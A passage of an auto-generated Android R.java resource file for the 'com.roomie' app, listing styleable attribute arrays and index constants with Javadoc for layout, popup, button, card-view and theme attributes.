Attributes that can be used with a LinearLayoutCompat_Layout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #LinearLayoutCompat_Layout_android_layout_gravity android:layout_gravity}</code></td><td></td></tr> <tr><td><code>{@link #LinearLayoutCompat_Layout_android_layout_height android:layout_height}</code></td><td></td></tr> <tr><td><code>{@link #LinearLayoutCompat_Layout_android_layout_weight android:layout_weight}</code></td><td></td></tr> <tr><td><code>{@link #LinearLayoutCompat_Layout_android_layout_width android:layout_width}</code></td><td></td></tr> </table> @see #LinearLayoutCompat_Layout_android_layout_gravity @see #LinearLayoutCompat_Layout_android_layout_height @see #LinearLayoutCompat_Layout_android_layout_weight @see #LinearLayoutCompat_Layout_android_layout_width */ public static final int[] LinearLayoutCompat_Layout = { 0x010100b3, 0x010100f4, 0x010100f5, 0x01010181 }; /** <p>This symbol is the offset where the {@link android.R.attr#layout_gravity} attribute's value can be found in the {@link #LinearLayoutCompat_Layout} array. @attr name android:layout_gravity */ public static final int LinearLayoutCompat_Layout_android_layout_gravity = 0; /** <p>This symbol is the offset where the {@link android.R.attr#layout_height} attribute's value can be found in the {@link #LinearLayoutCompat_Layout} array. @attr name android:layout_height */ public static final int LinearLayoutCompat_Layout_android_layout_height = 2; /** <p>This symbol is the offset where the {@link android.R.attr#layout_weight} attribute's value can be found in the {@link #LinearLayoutCompat_Layout} array. @attr name android:layout_weight */ public static final int LinearLayoutCompat_Layout_android_layout_weight = 3; /** <p>This symbol is the offset where the {@link android.R.attr#layout_width} attribute's value can be found in the {@link #LinearLayoutCompat_Layout} array. @attr name android:layout_width */ public static final int LinearLayoutCompat_Layout_android_layout_width = 1; /** Attributes that can be used with a ListPopupWindow. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ListPopupWindow_android_dropDownHorizontalOffset android:dropDownHorizontalOffset}</code></td><td> Amount of pixels by which the drop down should be offset horizontally.</td></tr> <tr><td><code>{@link #ListPopupWindow_android_dropDownVerticalOffset android:dropDownVerticalOffset}</code></td><td> Amount of pixels by which the drop down should be offset vertically.</td></tr> </table> @see #ListPopupWindow_android_dropDownHorizontalOffset @see #ListPopupWindow_android_dropDownVerticalOffset */ public static final int[] ListPopupWindow = { 0x010102ac, 0x010102ad }; /** <p> @attr description Amount of pixels by which the drop down should be offset horizontally. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#dropDownHorizontalOffset}. @attr name android:dropDownHorizontalOffset */ public static final int ListPopupWindow_android_dropDownHorizontalOffset = 0; /** <p> @attr description Amount of pixels by which the drop down should be offset vertically. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#dropDownVerticalOffset}. @attr name android:dropDownVerticalOffset */ public static final int ListPopupWindow_android_dropDownVerticalOffset = 1; /** Attributes that can be used with a LoadingImageView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #LoadingImageView_circleCrop com.roomie:circleCrop}</code></td><td></td></tr> <tr><td><code>{@link #LoadingImageView_imageAspectRatio com.roomie:imageAspectRatio}</code></td><td></td></tr> <tr><td><code>{@link #LoadingImageView_imageAspectRatioAdjust com.roomie:imageAspectRatioAdjust}</code></td><td></td></tr> </table> @see #LoadingImageView_circleCrop @see #LoadingImageView_imageAspectRatio @see #LoadingImageView_imageAspectRatioAdjust */ public static final int[] LoadingImageView = { 0x7f010000, 0x7f010001, 0x7f010002 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#circleCrop} attribute's value can be found in the {@link #LoadingImageView} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:circleCrop */ public static final int LoadingImageView_circleCrop = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#imageAspectRatio} attribute's value can be found in the {@link #LoadingImageView} array. <p>Must be a floating point value, such as "<code>1.2</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:imageAspectRatio */ public static final int LoadingImageView_imageAspectRatio = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#imageAspectRatioAdjust} attribute's value can be found in the {@link #LoadingImageView} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>adjust_width</code></td><td>1</td><td></td></tr> <tr><td><code>adjust_height</code></td><td>2</td><td></td></tr> </table> @attr name com.roomie:imageAspectRatioAdjust */ public static final int LoadingImageView_imageAspectRatioAdjust = 0; /** Attributes that can be used with a MaterialButton. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #MaterialButton_android_insetBottom android:insetBottom}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_android_insetLeft android:insetLeft}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_android_insetRight android:insetRight}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_android_insetTop android:insetTop}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_backgroundTint com.roomie:backgroundTint}</code></td><td> Tint to apply to the background.</td></tr> <tr><td><code>{@link #MaterialButton_backgroundTintMode com.roomie:backgroundTintMode}</code></td><td> Blending mode used to apply the background tint.</td></tr> <tr><td><code>{@link #MaterialButton_cornerRadius com.roomie:cornerRadius}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_icon com.roomie:icon}</code></td><td> Specifies the drawable used for the application icon.</td></tr> <tr><td><code>{@link #MaterialButton_iconGravity com.roomie:iconGravity}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_iconPadding com.roomie:iconPadding}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_iconSize com.roomie:iconSize}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_iconTint com.roomie:iconTint}</code></td><td> Tint to apply to the icon.</td></tr> <tr><td><code>{@link #MaterialButton_iconTintMode com.roomie:iconTintMode}</code></td><td> Blending mode used to apply the icon tint.</td></tr> <tr><td><code>{@link #MaterialButton_rippleColor com.roomie:rippleColor}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_strokeColor com.roomie:strokeColor}</code></td><td></td></tr> <tr><td><code>{@link #MaterialButton_strokeWidth com.roomie:strokeWidth}</code></td><td></td></tr> </table> @see #MaterialButton_android_insetBottom @see #MaterialButton_android_insetLeft @see #MaterialButton_android_insetRight @see #MaterialButton_android_insetTop @see #MaterialButton_backgroundTint @see #MaterialButton_backgroundTintMode @see #MaterialButton_cornerRadius @see #MaterialButton_icon @see #MaterialButton_iconGravity @see #MaterialButton_iconPadding @see #MaterialButton_iconSize @see #MaterialButton_iconTint @see #MaterialButton_iconTintMode @see #MaterialButton_rippleColor @see #MaterialButton_strokeColor @see #MaterialButton_strokeWidth */ public static final int[] MaterialButton = { 0x010101b7, 0x010101b8, 0x010101b9, 0x010101ba, 0x7f010032, 0x7f0100ee, 0x7f0100ef, 0x7f010122, 0x7f010123, 0x7f010131, 0x7f010134, 0x7f010135, 0x7f010196, 0x7f010197, 0x7f010198, 0x7f010199 }; /** <p>This symbol is the offset where the {@link android.R.attr#insetBottom} attribute's value can be found in the {@link #MaterialButton} array. @attr name android:insetBottom */ public static final int MaterialButton_android_insetBottom = 3; /** <p>This symbol is the offset where the {@link android.R.attr#insetLeft} attribute's value can be found in the {@link #MaterialButton} array. @attr name android:insetLeft */ public static final int MaterialButton_android_insetLeft = 0; /** <p>This symbol is the offset where the {@link android.R.attr#insetRight} attribute's value can be found in the {@link #MaterialButton} array. @attr name android:insetRight */ public static final int MaterialButton_android_insetRight = 1; /** <p>This symbol is the offset where the {@link android.R.attr#insetTop} attribute's value can be found in the {@link #MaterialButton} array. @attr name android:insetTop */ public static final int MaterialButton_android_insetTop = 2; /** <p> @attr description Tint to apply to the background. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:backgroundTint */ public static final int MaterialButton_backgroundTint = 7; /** <p> @attr description Blending mode used to apply the background tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:backgroundTintMode */ public static final int MaterialButton_backgroundTintMode = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#cornerRadius} attribute's value can be found in the {@link #MaterialButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:cornerRadius */ public static final int MaterialButton_cornerRadius = 15; /** <p> @attr description Specifies the drawable used for the application icon. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:icon */ public static final int MaterialButton_icon = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#iconGravity} attribute's value can be found in the {@link #MaterialButton} array. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>start</code></td><td>0x1</td><td></td></tr> <tr><td><code>textStart</code></td><td>0x2</td><td></td></tr> </table> @attr name com.roomie:iconGravity */ public static final int MaterialButton_iconGravity = 14; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#iconPadding} attribute's value can be found in the {@link #MaterialButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:iconPadding */ public static final int MaterialButton_iconPadding = 13; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#iconSize} attribute's value can be found in the {@link #MaterialButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:iconSize */ public static final int MaterialButton_iconSize = 12; /** <p> @attr description Tint to apply to the icon. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:iconTint */ public static final int MaterialButton_iconTint = 5; /** <p> @attr description Blending mode used to apply the icon tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the icon. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the icon. The icon’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the icon, but with the icon’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the icon with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:iconTintMode */ public static final int MaterialButton_iconTintMode = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#rippleColor} attribute's value can be found in the {@link #MaterialButton} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:rippleColor */ public static final int MaterialButton_rippleColor = 9; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#strokeColor} attribute's value can be found in the {@link #MaterialButton} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:strokeColor */ public static final int MaterialButton_strokeColor = 10; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#strokeWidth} attribute's value can be found in the {@link #MaterialButton} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:strokeWidth */ public static final int MaterialButton_strokeWidth = 11; /** Attributes that can be used with a MaterialCardView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #MaterialCardView_strokeColor com.roomie:strokeColor}</code></td><td></td></tr> <tr><td><code>{@link #MaterialCardView_strokeWidth com.roomie:strokeWidth}</code></td><td></td></tr> </table> @see #MaterialCardView_strokeColor @see #MaterialCardView_strokeWidth */ public static final int[] MaterialCardView = { 0x7f010134, 0x7f010135 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#strokeColor} attribute's value can be found in the {@link #MaterialCardView} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:strokeColor */ public static final int MaterialCardView_strokeColor = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#strokeWidth} attribute's value can be found in the {@link #MaterialCardView} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:strokeWidth */ public static final int MaterialCardView_strokeWidth = 1; /** Attributes that can be used with a MaterialComponentsTheme. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #MaterialComponentsTheme_bottomSheetDialogTheme com.roomie:bottomSheetDialogTheme}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_bottomSheetStyle com.roomie:bottomSheetStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_chipGroupStyle com.roomie:chipGroupStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_chipStandaloneStyle com.roomie:chipStandaloneStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_chipStyle com.roomie:chipStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_colorAccent com.roomie:colorAccent}</code></td><td> Bright complement to the primary branding color.</td></tr> <tr><td><code>{@link #MaterialComponentsTheme_colorBackgroundFloating com.roomie:colorBackgroundFloating}</code></td><td> Default color of background imagery for floating components, ex.</td></tr> <tr><td><code>{@link #MaterialComponentsTheme_colorPrimary com.roomie:colorPrimary}</code></td><td> The primary branding color for the app.</td></tr> <tr><td><code>{@link #MaterialComponentsTheme_colorPrimaryDark com.roomie:colorPrimaryDark}</code></td><td> Dark variant of the primary branding color.</td></tr> <tr><td><code>{@link #MaterialComponentsTheme_colorSecondary com.roomie:colorSecondary}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_editTextStyle com.roomie:editTextStyle}</code></td><td> Default EditText style.</td></tr> <tr><td><code>{@link #MaterialComponentsTheme_floatingActionButtonStyle com.roomie:floatingActionButtonStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_materialButtonStyle com.roomie:materialButtonStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_materialCardViewStyle com.roomie:materialCardViewStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_navigationViewStyle com.roomie:navigationViewStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_scrimBackground com.roomie:scrimBackground}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_snackbarButtonStyle com.roomie:snackbarButtonStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_tabStyle com.roomie:tabStyle}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceBody1 com.roomie:textAppearanceBody1}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceBody2 com.roomie:textAppearanceBody2}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceButton com.roomie:textAppearanceButton}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceCaption com.roomie:textAppearanceCaption}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceHeadline1 com.roomie:textAppearanceHeadline1}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceHeadline2 com.roomie:textAppearanceHeadline2}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceHeadline3 com.roomie:textAppearanceHeadline3}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceHeadline4 com.roomie:textAppearanceHeadline4}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceHeadline5 com.roomie:textAppearanceHeadline5}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceHeadline6 com.roomie:textAppearanceHeadline6}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceOverline com.roomie:textAppearanceOverline}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceSubtitle1 com.roomie:textAppearanceSubtitle1}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textAppearanceSubtitle2 com.roomie:textAppearanceSubtitle2}</code></td><td></td></tr> <tr><td><code>{@link #MaterialComponentsTheme_textInputStyle com.roomie:textInputStyle}</code></td><td></td></tr> </table> @see #MaterialComponentsTheme_bottomSheetDialogTheme @see #MaterialComponentsTheme_bottomSheetStyle @see #MaterialComponentsTheme_chipGroupStyle @see #MaterialComponentsTheme_chipStandaloneStyle @see #MaterialComponentsTheme_chipStyle @see #MaterialComponentsTheme_colorAccent @see #MaterialComponentsTheme_colorBackgroundFloating @see #MaterialComponentsTheme_colorPrimary @see #MaterialComponentsTheme_colorPrimaryDark @see #MaterialComponentsTheme_colorSecondary @see #MaterialComponentsTheme_editTextStyle @see #MaterialComponentsTheme_floatingActionButtonStyle @see #MaterialComponentsTheme_materialButtonStyle @see #MaterialComponentsTheme_materialCardViewStyle @see #MaterialComponentsTheme_navigationViewStyle @see #MaterialComponentsTheme_scrimBackground @see #MaterialComponentsTheme_snackbarButtonStyle @see #MaterialComponentsTheme_tabStyle @see #MaterialComponentsTheme_textAppearanceBody1 @see #MaterialComponentsTheme_textAppearanceBody2 @see #MaterialComponentsTheme_textAppearanceButton @see #MaterialComponentsTheme_textAppearanceCaption @see #MaterialComponentsTheme_textAppearanceHeadline1 @see #MaterialComponentsTheme_textAppearanceHeadline2 @see #MaterialComponentsTheme_textAppearanceHeadline3 @see #MaterialComponentsTheme_textAppearanceHeadline4 @see #MaterialComponentsTheme_textAppearanceHeadline5 @see #MaterialComponentsTheme_textAppearanceHeadline6 @see #MaterialComponentsTheme_textAppearanceOverline @see #MaterialComponentsTheme_textAppearanceSubtitle1 @see #MaterialComponentsTheme_textAppearanceSubtitle2 @see #MaterialComponentsTheme_textInputStyle */ public static final int[] MaterialComponentsTheme = { 0x7f0100b4, 0x7f0100b5, 0x7f0100b6, 0x7f0100bd, 0x7f0100cb, 0x7f010126, 0x7f010127, 0x7f010128, 0x7f010129, 0x7f01012a, 0x7f01012b, 0x7f01012c, 0x7f01012e, 0x7f01012f, 0x7f010130, 0x7f010132, 0x7f010136, 0x7f010137, 0x7f010138, 0x7f010139, 0x7f01013a, 0x7f01013b, 0x7f01013c, 0x7f01013d, 0x7f01013e, 0x7f01013f, 0x7f010140, 0x7f010141, 0x7f010142, 0x7f010143, 0x7f010144, 0x7f0101a5 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#bottomSheetDialogTheme} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:bottomSheetDialogTheme */ public static final int MaterialComponentsTheme_bottomSheetDialogTheme = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#bottomSheetStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:bottomSheetStyle */ public static final int MaterialComponentsTheme_bottomSheetStyle = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipGroupStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:chipGroupStyle */ public static final int MaterialComponentsTheme_chipGroupStyle = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipStandaloneStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:chipStandaloneStyle */ public static final int MaterialComponentsTheme_chipStandaloneStyle = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipStyle} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:chipStyle */ public static final int MaterialComponentsTheme_chipStyle = 9; /** <p> @attr description Bright complement to the primary branding color. By default, this is the color applied to framework controls (via colorControlActivated). <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorAccent */ public static final int MaterialComponentsTheme_colorAccent = 2; /** <p> @attr description Default color of background imagery for floating components, ex. dialogs, popups, and cards. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorBackgroundFloating */ public static final int MaterialComponentsTheme_colorBackgroundFloating = 3; /** <p> @attr description The primary branding color for the app. By default, this is the color applied to the action bar background. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorPrimary */ public static final int MaterialComponentsTheme_colorPrimary = 0; /** <p> @attr description Dark variant of the primary branding color. By default, this is the color applied to the status bar (via statusBarColor) and navigation bar (via navigationBarColor). <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:colorPrimaryDark */ public static final int MaterialComponentsTheme_colorPrimaryDark = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#colorSecondary} attribute's value can be found in the {@link #MaterialComponentsTheme} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:colorSecondary */ public static final int MaterialComponentsTheme_colorSecondary = 10; /** <p> @attr description Default EditText style. <p>Must be a reference to another resource, in the form 